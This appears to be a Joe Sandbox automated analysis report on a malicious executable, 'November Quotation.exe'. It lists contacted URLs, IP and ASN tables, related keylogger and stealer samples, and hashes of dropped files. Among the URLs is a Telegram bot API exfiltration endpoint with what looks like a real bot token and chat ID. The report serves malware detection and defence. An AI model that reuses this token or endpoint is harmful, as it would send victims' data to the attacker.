                                      https://api.telegram.org/botmsiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.microsoftpowershell.exe, 00000002.00000002.1862036159.00000000072F3000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1857229599.0000000004DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/Licensepowershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://checkip.dyndns.org/1&msiexec.exe, 00000005.00000002.2585049907.0000000026365000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Iconpowershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://drive.usercontent.google.com/msiexec.exe, 00000005.00000002.2572130777.000000000869C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      http://checkip.dyndns.orgmsiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000240C3000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://nsis.sf.net/NSIS_ErrorErrorNovember Quotation.exe, November Quotation.exe.2.drfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1857229599.0000000004DC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.mipowershell.exe, 00000002.00000002.1862036159.000000000734E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.commsiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://api.telegram.org/bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1857229599.0000000004C71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://drive.google.com/msiexec.exe, 00000005.00000002.2572130777.0000000008689000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/powershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1860047618.0000000005CDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.2583646535.00000000240E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://apis.google.commsiexec.exe, 00000005.00000003.1949167183.00000000086A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://checkip.dyndns.commsiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://api.telegram.orgmsiexec.exe, 00000005.00000002.2583646535.0000000024112000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.000000002417D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000242EC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.00000000241D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1857229599.0000000004C71000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2583646535.0000000024051000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://reallyfreegeoip.org/xml/msiexec.exe, 00000005.00000002.2583646535.00000000240CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        149.154.167.220
                                                                                        api.telegram.orgUnited Kingdom
                                                                                        62041TELEGRAMRUfalse
                                                                                        142.250.181.1
                                                                                        drive.usercontent.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        193.122.130.0
                                                                                        checkip.dyndns.comUnited States
                                                                                        31898ORACLE-BMC-31898USfalse
                                                                                        172.217.19.174
                                                                                        drive.google.comUnited States
                                                                                        15169GOOGLEUSfalse
                                                                                        172.67.177.134
                                                                                        reallyfreegeoip.orgUnited States
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1562309
                                                                                        Start date and time:2024-11-25 13:45:38 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 7m 11s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:10
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:November Quotation.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.evad.winEXE@6/15@6/5
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 66.7%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 94%
                                                                                        • Number of executed functions: 115
                                                                                        • Number of non-executed functions: 31
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                        • Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: November Quotation.exe
                                                                                        TimeTypeDescription
                                                                                        07:46:28API Interceptor38x Sleep call for process: powershell.exe modified
                                                                                        07:47:39API Interceptor34070x Sleep call for process: msiexec.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        149.154.167.220#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                          wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                              denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                  NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                    MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                      Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                        Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                          PaymentAdvice.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            193.122.130.0denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            SOA SEP 2024.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            PO-841122676_g787.exeGet hashmaliciousGuLoaderBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            Documents.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            #U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            e-dekont_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • checkip.dyndns.org/
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            s-part-0035.t-0009.t-msedge.netwMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                            • 13.107.246.63
                                                                                                            Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                            • 13.107.246.63
                                                                                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                            • 13.107.246.63
                                                                                                            api.telegram.org#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                            • 149.154.167.220
                                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            rorderrequirementsCIF-TRC809910645210.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            reallyfreegeoip.org#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 104.21.67.152
                                                                                                            IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            TELEGRAMRU#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                            • 149.154.167.220
                                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 149.154.167.99
                                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 149.154.167.220
                                                                                                            NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            MC8017774DOCS.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ORACLE-BMC-31898US#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            Pigroots.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 158.101.44.242
                                                                                                            Shave.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.130.0
                                                                                                            ZEcVl5jzXD.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 193.122.6.168
                                                                                                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            • 168.139.6.21
                                                                                                            CLOUDFLARENETUS#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 172.67.200.96
                                                                                                            F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            https://go.jrwcap.com/e/955053/230645595232154/6xyvj/710994189/h/-dwcgo8Jrn520ILsDDgocWZSKLzmmTijUb6c_giV2KAGet hashmaliciousPhisherBrowse
                                                                                                            • 104.22.72.81
                                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                            • 104.21.67.152
                                                                                                            file.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.21.88.250
                                                                                                            Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 172.67.206.110
                                                                                                            file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 104.21.88.250
                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                            • 172.67.155.47
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9ad#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            F7Xu8bRnXT.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            AWB NO - 09804480383.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            VSP469620.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 172.67.177.134
                                                                                                            IMG-20241119-WA0006(162KB).Pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            NEW P.O.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 172.67.177.134
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0e#U06a9#U067e#U06cc #U067e#U0631#U062f#U0627#U062e#U062a - 19112024,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 149.154.167.220
                                                                                                            dekont 25.11.2024 PDF.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            https://www.e-serviceparts.info/landingpages/cce21bb4-48dd-49da-9e48-d89a21f56454/RtynoRElk6VQIiohoauuXaUdv9Gb4EPJBf3UQg9_Um4Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 149.154.167.220
                                                                                                            denizbank 25.11.2024 E80 aspc.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            lcc333.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            lcc333.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            https://cgpsco.rahalat.net/contaGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            https://google.lt/amp/taerendil.online.fr/gpfv9cqYcuejGaVElbEvNcI6wCkeoGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 149.154.167.220
                                                                                                            37f463bf4616ecd445d4a1937da06e19PO_203-25.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            wMy37vlfvz.exeGet hashmaliciousDarkCloudBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            WNIOSEK BUD#U017bETOWY 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            412300061474#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            order requirements CIF-TRC809910645210.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            Cargo Invoice_pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            KAHILINGAN NG BADYET 25-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            URGENT!! DHL invoice SG00101637 Adobe#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.181.1
                                                                                                            • 172.217.19.174
                                                                                                            No context
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):14744
                                                                                                            Entropy (8bit):4.992175361088568
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                                                            MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                                                            SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                                                            SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                                                            SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Reputation:high, very likely benign file
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                            Malicious:false
                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):60
                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
